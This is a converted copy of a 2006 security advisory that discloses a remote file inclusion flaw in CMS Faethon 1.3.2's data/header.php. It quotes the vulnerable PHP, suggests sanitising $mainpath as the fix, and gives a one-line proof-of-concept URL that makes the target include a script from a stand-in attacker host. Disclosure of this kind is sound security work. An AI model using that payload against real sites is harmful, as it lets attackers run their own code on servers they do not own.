CMS Faethon 1.3.2 mainpath Remote File Inclusion Vulnerability.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

CMS Faethon php mainpath Remote File Remote File Inclusion header php mainpath File Inclusion Vulnerability http Vulnerability

1 ____________________   ___ ___ ________
2 \_   _____/\_   ___ \ /   |   \\_____  \  
3  |    __)_ /    \  \//    ~    \/   |   \ 
4  |        \\     \___\    Y    /    |    \
5 /_______  / \______  /\___|_  /\_______  /
6         \/         \/       \/         \/ 
7
8
.OR.ID
9 ECHO_ADV_33$2006
10
11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 [ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion
13 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
14
15 Author       : M.Hasran Addahroni a.k.a K−159
16 Date         : June, 16th 2006
17 Location     : Indonesia, Bali
18 Web          : http://advisories.echo.or.id/adv/adv33−K−159−2006.txt
19 Critical Lvl : Highly critical
20 Impact       : System access
21 Where        : From Remote
22 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
23
24 Affected software description:
25 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
26 CMS Faethon 
27
28 Application : CMS Faethon 
29 version     : 1.3.2
30 URL         : http://cmsfaethon.com/
31 Description :
32
33 CMS Faethon is content management system for different web pages.
34
35 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
36
37 Vulnerability:
38 ~~~~~~~~~~~~~~~
39
40 in folder data we found vulnerability script header.php.
41
42 −−−−−−−−−−−−−−−−−−−−−−−header.php−−−−−−−−−−−−−−−−−−−−−−
43 ....
44 <?php
45         include($mainpath . ’survey.php’);
46         ?>
47         <h2>RSS − cmsfaethon.com</h2>
48         <div class="rss−menu">
49                 <?php
50                 $source = ’http://cmsfaethon.com/feed/articles/rss2.php?LangSet=cs’;
51                 include($mainpath . ’rss−reader.php’);
52         ?>
Page 1/2
CMS Faethon 1.3.2 mainpath Remote File Inclusion Vulnerability
K−159
06/16/2006
53 ...
54 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
55
56 Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit
 this vulnerability with a simple php injection script.
57
58 Proof Of Concept:
59 ~~~~~~~~~~~~~~~~
60
61 http://target.com/[cms_faethon_path]/data/header.php?mainpath=http://attacker.com/evil.txt?
62
63 Solution:
64 ~~~~~~~~
65
66 sanitize variabel $mainpath in header.php
67
68
69 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
70 Shoutz:
71 ~~~~~~
72 ~ ping − my dearest wife, for all the luv the tears n the breath 
73 ~ y3dips,the_day,moby,comex,z3r0byt3,c−a−s−e,S‘to,lirva32,anonymous,kaiten
74 ~ masterpop3,maSter−oP,Lieur−Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
75 ~ sinChan,x‘shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit
76 ~ newbie_hacker@yahoogroups.com 
77 ~ #aikmel #e−c−h−o @irc.dal.net
78 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
79 Contact:
80 ~~~~~~~
81
82      K−159 || echo|staff || eufrato[at]gmail[dot]com
83      Homepage: http://k−159.echo.or.id/
84
85 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− [ EOF ] −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
86
87 # milw0rm.com [2006−06−16]
Page 2/2
CMS Faethon 1.3.2 mainpath Remote File Inclusion Vulnerability
K−159
06/16/2006